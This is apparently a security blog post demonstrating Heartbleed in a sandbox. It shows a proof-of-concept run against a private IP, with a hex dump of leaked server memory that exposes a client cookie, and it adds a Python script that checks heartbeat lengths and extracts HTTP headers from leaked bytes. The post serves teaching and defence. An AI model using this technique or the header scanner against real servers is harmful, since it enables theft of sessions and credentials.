Heartbleed: Viewing Session Data

A major problem with the Heartbleed vulnerability is that an intruder can read the running memory of the Web server. As this memory often contains live data, such as session variables, passwords, encryption keys, and so on, it can reveal sensitive user information. In this sandboxed demo, we can see that the cookie information sent by the client is visible within the running memory of the server:

From this we can see that the captured memory is:

billbuchanan@bills-mbp:~$ python heartbleed-poc.py  172.16.121.150
Scanning 172.16.121.150 on port 443
Connecting...
Sending Client Hello...
Waiting for Server Hello...
 ... received message: type = 22, ver = 0302, length = 66
 ... received message: type = 22, ver = 0302, length = 937
 ... received message: type = 22, ver = 0302, length = 331
 ... received message: type = 22, ver = 0302, length = 4
Server TLS version was 1.2

Sending heartbeat request...
 ... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
  0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C  .@....SC[...r...
  0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90  .+..H...9.......
  0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0  .w.3....f.....".
  0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00  !.9.8.........5.
  0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0  ................
  0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00  ............3.2.
  0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00  ....E.D...../...
  0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00  A...............
  0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01  ................
  0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00  ..I...........4.
  00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00  2...............
  00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00  ................
  00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00  ................
  00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 2E 38 0D 0A  ....#........8..
  00e0: 41 63 63 65 70 74 2D 4C 61 6E 67 75 61 67 65 3A  Accept-Language:
  00f0: 20 65 6E 2D 67 62 2C 65 6E 3B 71 3D 30 2E 35 0D   en-gb,en;q=0.5.
  0100: 0A 41 63 63 65 70 74 2D 45 6E 63 6F 64 69 6E 67  .Accept-Encoding
  0110: 3A 20 67 7A 69 70 2C 20 64 65 66 6C 61 74 65 0D  : gzip, deflate.
  0120: 0A 43 6F 6F 6B 69 65 3A 20 74 65 73 74 63 6F 6F  .Cookie: testcoo
  0130: 6B 69 65 3D 68 65 6C 6C 6F 2B 62 69 6C 6C 0D 0A  kie=hello+bill..
  0140: 43 6F 6E 6E 65 63 74 69 6F 6E 3A 20 6B 65 65 70  Connection: keep
  0150: 2D 61 6C 69 76 65 0D 0A 0D 0A 5C A1 0F 0A E2 D8  -alive....\.....
  0160: 66 30 62 A9 FC 99 A3 B7 A0 C4 00 00 00 00 00 00  f0b.............

A cookie is often used to hold things like a session ID and/or login credentials, so an intruder who captures it can steal these and log into the system.

How can we protect against this?

Well, it’s actually quite difficult. The reason this has happened is that OpenSSL is seen as a highly trusted program, so it is allowed to read from sensitive areas of memory. This memory contains the program’s data, such as its running variables, and can thus contain usernames, passwords, encryption keys, and so on. If we trust a program so highly, there are often very few checks that the operating system will make on how it operates. Other programs, such as those for Microsoft .NET and Java, run within a completely sandboxed environment, known as managed code, and thus there are checks on what they can access. Unfortunately a highly trusted component, especially one written in a low-level language such as C++, can gain access to sensitive areas that many other programs would not have the rights to. The solution is therefore really on the software development side, and it highlights the need to continually check programs for their operation, not only with normal data, but with extreme data inputs. Unfortunately many software developers do not spend enough time testing, and often they test their own code. So we need a whole new generation of people who know how to write code, and also how to test it. These people are not likely to actually write the code, but they are the people who will understand it, and know how to review and test it.
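As an added example (not part of the original post), here is a short Python script that rebuilds the bytes from a hex dump in the format printed above, applies the RFC 6520 length check that the patched OpenSSL performs (the claimed payload plus the mandatory 16 bytes of padding must fit inside the received record), and lists any HTTP headers, including the client's cookie, that appear in the leaked bytes. The dump excerpt embedded in the script is copied from the output above; the function names are my own.

```python
import re

# Constructed excerpt of the heartbeat-response hex dump printed by the PoC above:
# the first line (heartbeat header) and the lines that carry the HTTP headers.
DUMP = r"""
  0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C  .@....SC[...r...
  00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 2E 38 0D 0A  ....#........8..
  00e0: 41 63 63 65 70 74 2D 4C 61 6E 67 75 61 67 65 3A  Accept-Language:
  00f0: 20 65 6E 2D 67 62 2C 65 6E 3B 71 3D 30 2E 35 0D   en-gb,en;q=0.5.
  0100: 0A 41 63 63 65 70 74 2D 45 6E 63 6F 64 69 6E 67  .Accept-Encoding
  0110: 3A 20 67 7A 69 70 2C 20 64 65 66 6C 61 74 65 0D  : gzip, deflate.
  0120: 0A 43 6F 6F 6B 69 65 3A 20 74 65 73 74 63 6F 6F  .Cookie: testcoo
  0130: 6B 69 65 3D 68 65 6C 6C 6F 2B 62 69 6C 6C 0D 0A  kie=hello+bill..
  0140: 43 6F 6E 6E 65 63 74 69 6F 6E 3A 20 6B 65 65 70  Connection: keep
  0150: 2D 61 6C 69 76 65 0D 0A 0D 0A 5C A1 0F 0A E2 D8  -alive....\.....
"""

def parse_hexdump(text):
    """Rebuild the raw bytes from 'OFFSET: XX XX ...  ascii' lines (ASCII column ignored)."""
    out = bytearray()
    for line in text.splitlines():
        if ":" in line:
            out += bytes.fromhex(line.split(":", 1)[1][:16 * 3])  # 16 bytes, 3 chars each
    return bytes(out)

def validate_heartbeat(message, record_len=None):
    """RFC 6520 length check (the one the fixed OpenSSL applies): type(1) + length(2) +
    claimed payload + at least 16 bytes of padding must fit inside the received record."""
    record_len = len(message) if record_len is None else record_len
    if record_len < 3:
        return {"type": None, "payload_length": None, "accepted": False}
    payload_len = int.from_bytes(message[1:3], "big")
    return {"type": message[0], "payload_length": payload_len,
            "accepted": 1 + 2 + payload_len + 16 <= record_len}

HEADER_RE = re.compile(rb"([A-Za-z][A-Za-z0-9-]*): ([^\r\n]*)\r\n")

def find_http_headers(data):
    """Map HTTP header names to values found in leaked bytes, e.g. a client's Cookie."""
    return {n.decode("ascii"): v.decode("latin-1") for n, v in HEADER_RE.findall(data)}

if __name__ == "__main__":
    leaked = parse_hexdump(DUMP)
    # The PoC reported a 16384-byte record; the response header itself claims a 16384-byte payload.
    print(validate_heartbeat(leaked, record_len=16384))
    print(find_http_headers(leaked))
```

Run against the excerpt, the header bytes 02 40 00 decode to a heartbeat response claiming a 16384-byte payload, which the length check rejects because it cannot fit in a 16384-byte record with its padding; the header scan recovers the Cookie line seen in the dump.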
